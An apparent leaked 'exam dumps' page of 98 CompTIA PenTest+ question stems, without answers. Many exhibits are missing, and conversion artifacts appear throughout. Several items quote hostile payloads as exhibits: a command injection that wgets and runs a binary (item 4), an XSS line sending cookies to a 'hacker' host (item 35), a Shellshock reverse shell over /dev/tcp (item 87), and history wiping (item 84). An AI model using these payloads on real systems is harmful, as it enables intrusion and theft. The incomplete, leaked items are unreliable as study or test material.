PT0-002 Exam Dumps (V17.03): A Proper Study Guide for CompTIA PenTest+ Certification Exam Preparation

1. The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

2. autonumWhich of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

3. autonumThe delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted.

Which of the following BEST identifies this concept?

4. autonumA penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

5. autonumA client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

6. autonumA penetration tester ran a simple Python-based scanner.

The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

7. autonumA penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue.

Which of the following BEST describes this attack?

8. autonumA penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache.

The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

9. autonumA penetration tester created the following script to use in an engagement:

However, the tester is receiving the following error when trying to run the script:

Which of the following is the reason for the error?

10. autonumA penetration tester writes the following script:

Which of the following is the tester performing?

11. autonumA penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

12. autonumA penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

13. autonumA penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

14. autonumDRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

15. autonumA penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

16. autonumA penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

17. autonumA penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

18. autonumA company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

19. autonumA penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

20. autonumA penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

21. autonumA penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment.

Identification requires the penetration tester to:

✑ Have a full TCP connection

✑ Send a “hello” payload

✑ Walt for a response

✑ Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

22. autonumDuring a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

23. autonumA penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Which of the following would BEST support this task?

24. autonumA penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function.

Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

25. autonumA penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server.

Which of the following is the MOST likely reason for the error?

26. autonumPerforming a penetration test against an environment with SCADA devices brings additional safety risk because the:

27. autonumA CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server.

To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

28. autonumA penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food.

Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

29. autonumDuring a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign.

Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

30. autonumA mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

Which of the following commands should be used to accomplish the goal?

31. autonumWhich of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

32. autonumA penetration tester performs the following command:

curl CI Chttp2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

33. autonumA penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.

Which of the following vulnerabilities has the tester exploited?

34. autonumA client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.

Which of the following methodologies should be used to BEST meet the client's expectations?

35. autonumGiven the following code:

<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC

RIPT>

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

36. autonumA client evaluating a penetration testing company requests examples of its work.

Which of the following represents the BEST course of action for the penetration testers?

37. autonumWhich of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

38. autonumWhich of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

39. autonumA Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.

Which of the following should the penetration tester consider BEFORE running a scan?

40. autonumA penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.

Which of the following steps should the tester take NEXT?

41. autonumGiven the following code:

Which of the following data structures is systems?

42. autonumA customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours.

Which of the following BEST describes why this would be necessary?

43. autonumWhich of the following would a company's hunt team be MOST interested in seeing in a final report?

44. autonumA penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

45. autonumA company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

46. autonumA penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

47. autonumA penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR."

Which of the following attacks is being attempted?

48. autonumA penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

49. autonumA penetration tester needs to upload the results of a port scan to a centralized security tool.

Which of the following commands would allow the tester to save the results in an interchangeable format?

50. autonumWhich of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

51. autonumA penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

Which of the following changes should the tester apply to make the script work as intended?

52. autonumAn Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

53. autonumDuring a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

54. autonumA penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

Which of the following could be used for a denial-of-service attack on the network segment?

55. autonumA company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?

56. autonumA penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign.

Which of the following is the BEST passive method of obtaining the technical contacts for the website?

57. autonumA penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

✑ Pre-engagement interaction (scoping and ROE)

✑ Intelligence gathering (reconnaissance)

✑ Threat modeling

✑ Vulnerability analysis

✑ Exploitation and post exploitation

✑ Reporting

Which of the following methodologies does the client use?

58. autonumA red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

59. autonumWhich of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

60. autonumGiven the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

61. autonumA company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.

Which of the following attack types is MOST concerning to the company?

62. autonumA penetration tester is exploring a client’s website.

The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)

> GET /readmine.html HTTP/1.1

> Host: 10.2.11.144

> User-Agent: curl/7.67.0

> Accept: */*

>

* Mark bundle as not supporting multiuse

< HTTP/1.1 200

< Date: Tue, 02 Feb 2021 21:46:47 GMT

< Server: Apache/2.4.41 (Debian)

< Content-Length: 317

< Content-Type: text/html; charset=iso-8859-1

<

<!DOCTYPE html> <html lang=”en”> <head>

<meta name=”viewport” content=”width=device-width” />

<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /> <title>WordPress &#8250; ReadMe</title>

<link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /> </head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

63. autonumA company requires that all hypervisors have the latest available patches installed.

Which of the following would BEST explain the reason why this policy is in place?

64. autonumA penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server.

Which of the following log files will show this activity?

65. autonumA penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions.

Which of the following is the MOST likely culprit?

66. autonumIn the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers.

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

67. autonumA penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester.

Which of the following would be the most appropriate NEXT step?

68. autonumDuring an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server.

Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

69. autonumCORRECT TEXT

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

70. autonumDuring an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng.

Which of the following should be recommended to the client to remediate this issue?

71. autonumA penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities.

Which of the following tools would be BEST suited for this task?

72. autonumDuring an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format.

Which of the following types of attacks would MOST likely be used to avoid account lockout?

73. autonumWhich of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

74. autonumIn Python socket programming, SOCK_DGRAM type is:

75. autonumA penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant.

Which of the following is the MINIMUM frequency to complete the scan of the system?

76. autonumA penetration tester is trying to restrict searches on Google to a specific domain.

Which of the following commands should the penetration tester consider?

77. autonumA penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

78. autonumA penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

79. autonumA penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

80. autonumWhich of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

81. autonumA security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

82. autonumWhich of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

83. autonumA penetration tester wants to test a list of common passwords against the SSH daemon on a network device.

Which of the following tools would be BEST to use for this purpose?

84. autonumA penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

85. autonumA penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

86. autonumA penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

87. autonumA penetration tester discovers a vulnerable web server at 10.10.1.1.

The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,

“Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

88. autonumDuring the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

89. autonumA penetration tester who is working remotely is conducting a penetration test using a wireless connection.

Which of the following is the BEST way to provide confidentiality for the client while using this connection?

90. autonumDRAG DROP

During a penetration test, you gain access to a system with a limited user interface. This

machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

91. autonumA penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments.

Which of the following techniques should the tester select to accomplish this task?

92. autonumA penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

93. autonumA penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible.

Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

94. autonumWhich of the following BEST describe the OWASP Top 10? (Choose two.)

95. autonumDeconfliction is necessary when the penetration test:

96. autonumA penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

97. autonumWhich of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

98. autonumA company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?